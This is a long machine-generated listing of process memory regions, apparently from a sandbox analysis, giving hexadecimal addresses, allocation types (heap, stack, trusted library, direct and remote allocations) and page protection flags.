trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
449D000
stack
page read and write
27FF0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B8F25B000
heap
page read and write
278A0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F530A7000
heap
page execute and read and write
20B8F202000
heap
page read and write
28F52EE0000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
2640F000
trusted library allocation
page read and write
29B0000
heap
page readonly
2D84000
trusted library allocation
page read and write
7BFB000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7CB5000
trusted library allocation
page read and write
272AE000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7FF7BFDCB000
trusted library allocation
page read and write
264FF000
trusted library allocation
page read and write
977D000
heap
page read and write
9785000
heap
page read and write
20B8F25B000
heap
page read and write
6CC0000
heap
page execute and read and write
2A1A000
heap
page read and write
6AAE000
stack
page read and write
251D0000
trusted library allocation
page read and write
2890000
heap
page read and write
2DA6000
trusted library allocation
page execute and read and write
25E0000
heap
page read and write
271F0000
trusted library allocation
page read and write
81D0000
direct allocation
page read and write
251D0000
trusted library allocation
page read and write
272B1000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
2D8D000
trusted library allocation
page execute and read and write
20B8F22A000
heap
page read and write
278A0000
trusted library allocation
page read and write
2783D000
stack
page read and write
28130000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
B6397FE000
stack
page read and write
25120000
trusted library allocation
page read and write
27390000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7F70000
remote allocation
page execute and read and write
25130000
heap
page execute and read and write
24800000
direct allocation
page read and write
251D0000
trusted library allocation
page read and write
20B8F25B000
heap
page read and write
20B8F202000
heap
page read and write
7030000
trusted library allocation
page read and write
C5D0000
direct allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
28F64DCE000
trusted library allocation
page read and write
24FB0000
direct allocation
page read and write
28F53150000
heap
page read and write
20B91104000
heap
page read and write
20B8F1EF000
heap
page read and write
265F8000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page execute and read and write
253A5000
trusted library allocation
page read and write
20B91082000
heap
page read and write
278A0000
trusted library allocation
page read and write
9370000
remote allocation
page execute and read and write
28F5687A000
trusted library allocation
page read and write
7FF7C0100000
trusted library allocation
page read and write
25467000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B90B20000
heap
page read and write
27FF0000
trusted library allocation
page read and write
28190000
trusted library allocation
page execute and read and write
28F0000
trusted library allocation
page read and write
28150000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
27540000
heap
page read and write
254ED000
trusted library allocation
page read and write
28150000
trusted library allocation
page read and write
28F54AE1000
trusted library allocation
page read and write
20B8F220000
heap
page read and write
28F53070000
trusted library allocation
page read and write
24860000
direct allocation
page read and write
7FF7C0120000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
29AE000
stack
page read and write
24E7D000
stack
page read and write
6CF2000
heap
page read and write
28F5685C000
trusted library allocation
page read and write
93D0000
direct allocation
page execute and read and write
252F9000
trusted library allocation
page read and write
20B910AF000
heap
page read and write
7FF7C00F0000
trusted library allocation
page read and write
211CFFE000
stack
page read and write
28F6D04E000
heap
page read and write
8130000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
20B8F267000
heap
page read and write
27880000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
251D6000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
7FF7BFF92000
trusted library allocation
page read and write
275FE000
heap
page read and write
27FF0000
trusted library allocation
page read and write
7FF7C00D0000
trusted library allocation
page read and write
211CCFF000
stack
page read and write
247C0000
direct allocation
page read and write
278A0000
trusted library allocation
page read and write
29C8000
trusted library allocation
page read and write
2788D000
trusted library allocation
page read and write
272A2000
trusted library allocation
page read and write
6AEE000
stack
page read and write
251D0000
trusted library allocation
page read and write
20B8F25B000
heap
page read and write
24F9F000
stack
page read and write
20B910BB000
heap
page read and write
278A0000
trusted library allocation
page read and write
28140000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
26262000
trusted library allocation
page read and write
427E000
stack
page read and write
253DC000
trusted library allocation
page read and write
7E00000
heap
page read and write
28F52F47000
heap
page read and write
251D0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
254F3000
trusted library allocation
page read and write
273F000
heap
page read and write
7060000
trusted library allocation
page read and write
8970000
remote allocation
page execute and read and write
251D0000
trusted library allocation
page read and write
28F52F65000
heap
page read and write
20B91104000
heap
page read and write
6830000
direct allocation
page read and write
20B8F249000
heap
page read and write
26211000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
28020000
trusted library allocation
page read and write
275E4000
heap
page read and write
7ECE000
stack
page read and write
27FF0000
trusted library allocation
page read and write
29F0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
28F6CEFA000
heap
page read and write
28F54F9D000
trusted library allocation
page read and write
20B9109E000
heap
page read and write
28000000
trusted library allocation
page execute and read and write
7F50000
heap
page read and write
27880000
trusted library allocation
page read and write
28F53155000
heap
page read and write
95B0000
heap
page read and write
27FF0000
trusted library allocation
page read and write
7F9C000
heap
page read and write
26275000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
25110000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
20B8F1EF000
heap
page read and write
68EE000
stack
page read and write
28170000
trusted library allocation
page read and write
6860000
direct allocation
page read and write
28380000
trusted library allocation
page read and write
4D70000
remote allocation
page execute and read and write
254E9000
trusted library allocation
page read and write
B6393FE000
stack
page read and write
20B8F21D000
heap
page read and write
27FF0000
trusted library allocation
page read and write
20B910AB000
heap
page read and write
25110000
trusted library allocation
page read and write
7F1E000
heap
page read and write
6FED000
stack
page read and write
28390000
trusted library allocation
page read and write
28020000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
69EE000
stack
page read and write
251D0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28090000
trusted library allocation
page read and write
28170000
trusted library allocation
page read and write
259E000
stack
page read and write
27FF0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
275BC000
heap
page read and write
25120000
heap
page read and write
6BD0000
heap
page read and write
423E000
stack
page read and write
272D0000
trusted library allocation
page read and write
251E0000
heap
page read and write
28F56857000
trusted library allocation
page read and write
28020000
trusted library allocation
page read and write
20B8F234000
heap
page read and write
6B2E000
stack
page read and write
28F6CF44000
heap
page read and write
272D0000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
27390000
trusted library allocation
page read and write
28F55712000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
20B8F240000
heap
page read and write
27FF0000
trusted library allocation
page read and write
26329000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B8F214000
heap
page read and write
9587000
heap
page read and write
26277000
trusted library allocation
page read and write
696D000
stack
page read and write
2768000
heap
page read and write
20B8F231000
heap
page read and write
251D0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
254E7000
trusted library allocation
page read and write
24870000
direct allocation
page read and write
28170000
trusted library allocation
page read and write
2772000
heap
page read and write
28C0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
28020000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F5687E000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
44A0000
heap
page execute and read and write
27880000
trusted library allocation
page read and write
2546A000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
271F8000
trusted library allocation
page read and write
250C0000
heap
page read and write
7FF7BFDB0000
trusted library allocation
page read and write
7FF7BFDC0000
trusted library allocation
page read and write
28F54A90000
heap
page execute and read and write
20B8F235000
heap
page read and write
2625B000
trusted library allocation
page read and write
7FF7C0140000
trusted library allocation
page read and write
20B8F1DC000
heap
page read and write
253D4000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
25475000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
25255000
trusted library allocation
page read and write
28F6CE73000
heap
page read and write
251D0000
trusted library allocation
page read and write
6CF0000
heap
page read and write
25DD000
stack
page read and write
28F52F94000
heap
page read and write
7FF7BFFF0000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
25140000
heap
page execute and read and write
682A000
stack
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
6F6F000
stack
page read and write
27880000
trusted library allocation
page read and write
272F0000
heap
page read and write
27FE0000
trusted library allocation
page read and write
24E3F000
stack
page read and write
20B91085000
heap
page read and write
251D0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
6CF4000
heap
page read and write
28F64DDD000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28F54F88000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
2619000
heap
page read and write
20B8F202000
heap
page read and write
6DD5000
heap
page read and write
275DF000
heap
page read and write
24850000
direct allocation
page read and write
20B8F251000
heap
page read and write
20B8F214000
heap
page read and write
7010000
trusted library allocation
page execute and read and write
277FE000
stack
page read and write
251D0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
20B8F25B000
heap
page read and write
251D0000
trusted library allocation
page read and write
20B8F135000
heap
page read and write
27FF0000
trusted library allocation
page read and write
264B8000
trusted library allocation
page read and write
252A1000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B8F1EF000
heap
page read and write
7FF7BFDB4000
trusted library allocation
page read and write
26412000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
20B8F23E000
heap
page read and write
27FF0000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
28170000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
250A0000
trusted library allocation
page read and write
B6396FE000
stack
page read and write
27FF0000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28160000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
2DA2000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F56905000
trusted library allocation
page read and write
20B8EFF0000
heap
page read and write
7FF7BFED0000
trusted library allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7FF7C0030000
trusted library allocation
page read and write
2D83000
trusted library allocation
page execute and read and write
28F6D030000
heap
page read and write
28150000
trusted library allocation
page read and write
20B8F1F7000
heap
page read and write
278A0000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
6D1C000
heap
page read and write
252A5000
trusted library allocation
page read and write
27FDE000
stack
page read and write
450B000
trusted library allocation
page read and write
6B70000
remote allocation
page execute and read and write
27FE0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
B638DA3000
stack
page read and write
20B9108A000
heap
page read and write
8180000
direct allocation
page read and write
278A0000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
28130000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
26254000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
275ED000
heap
page read and write
7FF7BFFB0000
trusted library allocation
page read and write
28F53000000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F52F90000
heap
page read and write
7F10000
heap
page read and write
27FF0000
trusted library allocation
page read and write
2529D000
trusted library allocation
page read and write
20B8F210000
heap
page read and write
7E8C000
stack
page read and write
28130000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28020000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
2500A000
stack
page read and write
27880000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F52E85000
heap
page read and write
26B8000
heap
page read and write
27FF0000
trusted library allocation
page read and write
6D6A000
heap
page read and write
20B91098000
heap
page read and write
28F52F53000
heap
page read and write
278A0000
trusted library allocation
page read and write
20B8F249000
heap
page read and write
4300000
heap
page read and write
96A0000
heap
page read and write
28F55115000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
69AB000
stack
page read and write
2D9D000
trusted library allocation
page execute and read and write
28140000
trusted library allocation
page execute and read and write
20B8F249000
heap
page read and write
7BC0000
trusted library allocation
page read and write
7DEE000
stack
page read and write
28F6CE71000
heap
page read and write
54BB000
trusted library allocation
page read and write
20B91104000
heap
page read and write
27601000
heap
page read and write
278A0000
trusted library allocation
page read and write
20B91088000
heap
page read and write
2508E000
stack
page read and write
5770000
remote allocation
page execute and read and write
20B8F22B000
heap
page read and write
6DA1000
heap
page read and write
7F76000
heap
page read and write
7FA0000
heap
page read and write
275D1000
heap
page read and write
253CE000
trusted library allocation
page read and write
7B90000
trusted library allocation
page execute and read and write
265D8000
trusted library allocation
page read and write
28F64B01000
trusted library allocation
page read and write
26219000
trusted library allocation
page read and write
20B8F22F000
heap
page read and write
251D0000
trusted library allocation
page read and write
81C0000
direct allocation
page read and write
28170000
trusted library allocation
page read and write
20B91104000
heap
page read and write
28F530A0000
heap
page execute and read and write
28FA000
trusted library allocation
page execute and read and write
278A0000
trusted library allocation
page read and write
28F6D0D0000
heap
page read and write
26B0000
heap
page read and write
252D4000
trusted library allocation
page read and write
211C9FE000
stack
page read and write
7FF7BFF50000
trusted library allocation
page read and write
269E000
stack
page read and write
9580000
heap
page read and write
27880000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
264EA000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
24FC0000
direct allocation
page read and write
28120000
trusted library allocation
page read and write
262D4000
trusted library allocation
page read and write
2615000
heap
page read and write
20B8F23E000
heap
page read and write
252AD000
trusted library allocation
page read and write
8190000
direct allocation
page read and write
27FF0000
trusted library allocation
page read and write
974D000
heap
page read and write
20B8F25B000
heap
page read and write
9DD0000
direct allocation
page execute and read and write
251D0000
trusted library allocation
page read and write
6880000
direct allocation
page read and write
27606000
heap
page read and write
28F54AD0000
heap
page read and write
20B8F28D000
heap
page read and write
251D0000
trusted library allocation
page read and write
252A9000
trusted library allocation
page read and write
28170000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
2739A000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
26204000
trusted library allocation
page read and write
2659E000
trusted library allocation
page read and write
20B91082000
heap
page read and write
28170000
trusted library allocation
page read and write
28F530F0000
heap
page execute and read and write
275D1000
heap
page read and write
278A0000
trusted library allocation
page read and write
BBD0000
direct allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
2756D000
heap
page read and write
265E000
stack
page read and write
7AD0000
trusted library allocation
page read and write
20B910A6000
heap
page read and write
28020000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
7FF7BFF70000
trusted library allocation
page execute and read and write
26693000
trusted library allocation
page read and write
28F5490A000
heap
page read and write
2523D000
trusted library allocation
page read and write
28130000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28F551AC000
trusted library allocation
page read and write
20B8F20D000
heap
page read and write
28020000
trusted library allocation
page read and write
20B9118F000
heap
page read and write
20B8F23F000
heap
page read and write
20B8F0D0000
heap
page read and write
2666B000
trusted library allocation
page read and write
2DB2000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
25264000
trusted library allocation
page read and write
28F52D30000
heap
page read and write
7FF7BFE96000
trusted library allocation
page execute and read and write
2562B000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
2518C000
stack
page read and write
28F6D0B5000
heap
page read and write
27FF0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
20B91093000
heap
page read and write
25299000
trusted library allocation
page read and write
7FF7BFF61000
trusted library allocation
page read and write
7FF7C0110000
trusted library allocation
page read and write
28F52EF0000
heap
page readonly
27FF0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
26582000
trusted library allocation
page read and write
24F20000
remote allocation
page read and write
28020000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
96F0000
direct allocation
page read and write
20B8F23C000
heap
page read and write
25120000
trusted library allocation
page read and write
2D80000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7FF7BFFE0000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
251D1000
trusted library allocation
page read and write
25295000
trusted library allocation
page read and write
25260000
trusted library allocation
page read and write
28F64AE1000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
264C7000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page execute and read and write
247E0000
direct allocation
page read and write
6890000
direct allocation
page read and write
251D0000
trusted library allocation
page read and write
2510F000
stack
page read and write
251D0000
trusted library allocation
page read and write
20B8F0F0000
heap
page read and write
2635F000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
20B910C5000
heap
page read and write
277BE000
stack
page read and write
25120000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
28F556EE000
trusted library allocation
page read and write
97BF000
heap
page read and write
20B91104000
heap
page read and write
20B91104000
heap
page read and write
2550000
heap
page read and write
440F000
stack
page read and write
261F1000
trusted library allocation
page read and write
266BD000
trusted library allocation
page read and write
7FF7BFFA0000
trusted library allocation
page execute and read and write
20B91087000
heap
page read and write
28120000
trusted library allocation
page read and write
68A0000
direct allocation
page read and write
9585000
heap
page read and write
27FF0000
trusted library allocation
page read and write
54B1000
trusted library allocation
page read and write
28F56A06000
trusted library allocation
page read and write
28170000
trusted library allocation
page read and write
20B910B3000
heap
page read and write
251D0000
trusted library allocation
page read and write
7FF7BFE6C000
trusted library allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
20B8F1F7000
heap
page read and write
27380000
trusted library allocation
page read and write
28F56871000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
28F568ED000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
B639479000
stack
page read and write
9766000
heap
page read and write
7BA0000
heap
page read and write
42D5000
heap
page execute and read and write
27F9E000
stack
page read and write
251D0000
trusted library allocation
page read and write
254E1000
trusted library allocation
page read and write
24830000
direct allocation
page read and write
7FF7BFDBD000
trusted library allocation
page execute and read and write
6D00000
heap
page read and write
28F54F65000
trusted library allocation
page read and write
4608000
trusted library allocation
page read and write
28020000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
26280000
trusted library allocation
page read and write
253B0000
trusted library allocation
page read and write
254E4000
trusted library allocation
page read and write
28F54F6F000
trusted library allocation
page read and write
28030000
trusted library allocation
page read and write
275DF000
heap
page read and write
296E000
stack
page read and write
2701000
heap
page read and write
28180000
trusted library allocation
page read and write
20B8F249000
heap
page read and write
27FF0000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
26563000
trusted library allocation
page read and write
27601000
heap
page read and write
278A0000
trusted library allocation
page read and write
28F52EC0000
trusted library allocation
page read and write
43C000
stack
page read and write
B6395F9000
stack
page read and write
28F52E80000
heap
page read and write
251D0000
trusted library allocation
page read and write
7FF7C0090000
trusted library allocation
page read and write
28F54F73000
trusted library allocation
page read and write
2539D000
trusted library allocation
page read and write
6DC2000
heap
page read and write
28120000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
28D3000
trusted library allocation
page execute and read and write
7050000
trusted library allocation
page read and write
265AC000
trusted library allocation
page read and write
27890000
trusted library allocation
page execute and read and write
20B8F23E000
heap
page read and write
278A0000
trusted library allocation
page read and write
24EBD000
stack
page read and write
2DB7000
trusted library allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
20B9108E000
heap
page read and write
2737E000
stack
page read and write
28010000
trusted library allocation
page read and write
28000000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
2546C000
trusted library allocation
page read and write
28F6CE20000
heap
page read and write
211C8FA000
stack
page read and write
2DA0000
trusted library allocation
page read and write
275C2000
heap
page read and write
2A10000
heap
page read and write
275DF000
heap
page read and write
27FF0000
trusted library allocation
page read and write
261FF000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28010000
trusted library allocation
page read and write
281A0000
trusted library allocation
page read and write
96E0000
direct allocation
page read and write
26F3000
heap
page read and write
2920000
trusted library allocation
page read and write
25471000
trusted library allocation
page read and write
254A3000
trusted library allocation
page read and write
9840000
heap
page read and write
20B91081000
heap
page read and write
28D4000
trusted library allocation
page read and write
6D2C000
heap
page read and write
20B910BF000
heap
page read and write
28F52F45000
heap
page read and write
28170000
trusted library allocation
page read and write
2549D000
trusted library allocation
page read and write
263BC000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
26589000
trusted library allocation
page read and write
24DB0000
trusted library allocation
page read and write
6DCC000
heap
page read and write
28F56112000
trusted library allocation
page read and write
6CD8000
trusted library allocation
page read and write
54D9000
trusted library allocation
page read and write
211CDFE000
stack
page read and write
20B8F25B000
heap
page read and write
20B90F6E000
heap
page read and write
251D0000
trusted library allocation
page read and write
28DD000
trusted library allocation
page execute and read and write
20B8F25B000
heap
page read and write
97D9000
heap
page read and write
25268000
trusted library allocation
page read and write
7FF7C00B0000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
26CD000
heap
page read and write
7F6A000
heap
page read and write
251D0000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
CFD0000
direct allocation
page execute and read and write
278A0000
trusted library allocation
page read and write
20B91104000
heap
page read and write
28F52F00000
heap
page read and write
20B912AF000
heap
page read and write
24820000
direct allocation
page read and write
27880000
trusted library allocation
page read and write
7B8E000
stack
page read and write
28180000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
28F54F77000
trusted library allocation
page read and write
44B1000
trusted library allocation
page read and write
81E0000
direct allocation
page read and write
251D0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
970A000
heap
page read and write
251D0000
trusted library allocation
page read and write
97C0000
heap
page read and write
27FF0000
trusted library allocation
page read and write
28F52F4B000
heap
page read and write
28170000
trusted library allocation
page read and write
28F556D7000
trusted library allocation
page read and write
27FE0000
trusted library allocation
page execute and read and write
250B0000
trusted library allocation
page read and write
247D0000
direct allocation
page read and write
278A0000
trusted library allocation
page read and write
9785000
heap
page read and write
7FF7BFF6A000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
28000000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
B6390FE000
stack
page read and write
438F000
stack
page read and write
251D0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
7B4D000
stack
page read and write
211D3FB000
stack
page read and write
24BD0000
heap
page read and write
251D0000
trusted library allocation
page read and write
20B9108E000
heap
page read and write
27380000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7FF7BFE66000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
B63937E000
stack
page read and write
9778000
heap
page read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
B63917E000
stack
page read and write
6FAE000
stack
page read and write
2524A000
trusted library allocation
page read and write
27441000
heap
page read and write
251D0000
trusted library allocation
page read and write
20B8F213000
heap
page read and write
28F53030000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
712B000
stack
page read and write
20B910A3000
heap
page read and write
25442000
trusted library allocation
page read and write
2642E000
trusted library allocation
page read and write
2528D000
trusted library allocation
page read and write
8170000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28137000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
2DB5000
trusted library allocation
page execute and read and write
27880000
trusted library allocation
page read and write
7FF7C0040000
trusted library allocation
page read and write
8140000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
28150000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
2905000
trusted library allocation
page execute and read and write
251D0000
trusted library allocation
page read and write
26593000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
251D1000
trusted library allocation
page read and write
7DAE000
stack
page read and write
251D0000
trusted library allocation
page read and write
20B8F23E000
heap
page read and write
24F20000
remote allocation
page read and write
20B9118D000
heap
page read and write
278A0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
24840000
direct allocation
page read and write
7C10000
heap
page read and write
27FF0000
trusted library allocation
page read and write
2902000
trusted library allocation
page read and write
24F20000
remote allocation
page read and write
28380000
trusted library allocation
page read and write
6840000
direct allocation
page read and write
81F0000
trusted library allocation
page execute and read and write
27FF0000
trusted library allocation
page read and write
6F2E000
stack
page read and write
251D0000
trusted library allocation
page read and write
9700000
heap
page read and write
251D0000
trusted library allocation
page read and write
264A2000
trusted library allocation
page read and write
2654A000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
B63977E000
stack
page read and write
278A0000
trusted library allocation
page read and write
20B91104000
heap
page read and write
275D1000
heap
page read and write
B63907E000
stack
page read and write
26349000
trusted library allocation
page read and write
7E4C000
stack
page read and write
251D0000
trusted library allocation
page read and write
B63A2CD000
stack
page read and write
27880000
trusted library allocation
page read and write
20B8F243000
heap
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28010000
trusted library allocation
page execute and read and write
7FF7C00C0000
trusted library allocation
page read and write
26268000
trusted library allocation
page read and write
28160000
trusted library allocation
page read and write
B63A3CB000
stack
page read and write
27FF0000
trusted library allocation
page read and write
20B9109D000
heap
page read and write
278A0000
trusted library allocation
page read and write
28F52E30000
heap
page read and write
27880000
trusted library allocation
page read and write
97CA000
heap
page read and write
42BE000
stack
page read and write
20B9108A000
heap
page read and write
20B8F26A000
heap
page read and write
251D0000
trusted library allocation
page read and write
28F568AF000
trusted library allocation
page read and write
2536B000
trusted library allocation
page read and write
28E9000
trusted library allocation
page read and write
27441000
heap
page read and write
88C0000
direct allocation
page execute and read and write
251D0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
211CEFE000
stack
page read and write
27FF0000
trusted library allocation
page read and write
28F52E90000
heap
page read and write
254D3000
trusted library allocation
page read and write
6BC0000
heap
page read and write
24C8F000
stack
page read and write
24DFE000
stack
page read and write
7FF7C0010000
trusted library allocation
page read and write
24C4E000
stack
page read and write
28F6D0DB000
heap
page read and write
28000000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
27294000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
24D0E000
stack
page read and write
27880000
trusted library allocation
page read and write
7FF7BFE60000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
27440000
heap
page read and write
20B91104000
heap
page read and write
28F54F5B000
trusted library allocation
page read and write
28B0000
trusted library section
page read and write
27880000
trusted library allocation
page read and write
20B8F223000
heap
page read and write
25462000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
28F5686F000
trusted library allocation
page read and write
27396000
trusted library allocation
page read and write
7FF7C0020000
trusted library allocation
page read and write
20B8F1C9000
heap
page read and write
7FF7BFE70000
trusted library allocation
page execute and read and write
251D0000
trusted library allocation
page read and write
20B8F1A9000
heap
page read and write
251D0000
trusted library allocation
page read and write
B63A34A000
stack
page read and write
2900000
trusted library allocation
page read and write
2620B000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28030000
trusted library allocation
page execute and read and write
251D0000
trusted library allocation
page read and write
7DF4A3540000
trusted library allocation
page execute and read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
41FC000
stack
page read and write
275A3000
heap
page read and write
977F000
heap
page read and write
7FF7C0080000
trusted library allocation
page read and write
28F6CF20000
heap
page read and write
27FF0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
6870000
direct allocation
page read and write
20B8F231000
heap
page read and write
211CAFE000
stack
page read and write
20B8F207000
heap
page read and write
28120000
trusted library allocation
page read and write
263D2000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
6A2D000
stack
page read and write
4A9B000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
253A3000
trusted library allocation
page read and write
26556000
trusted library allocation
page read and write
20B8F284000
heap
page read and write
7FF7BFFC0000
trusted library allocation
page read and write
253E1000
trusted library allocation
page read and write
20B8F1C9000
heap
page read and write
20B91104000
heap
page read and write
2610000
heap
page read and write
4260000
remote allocation
page execute and read and write
28170000
trusted library allocation
page read and write
B6391FE000
stack
page read and write
20B91104000
heap
page read and write
29E0000
trusted library allocation
page execute and read and write
2729E000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
7FF7C0130000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F55705000
trusted library allocation
page read and write
7FF7C00E0000
trusted library allocation
page read and write
81A0000
direct allocation
page read and write
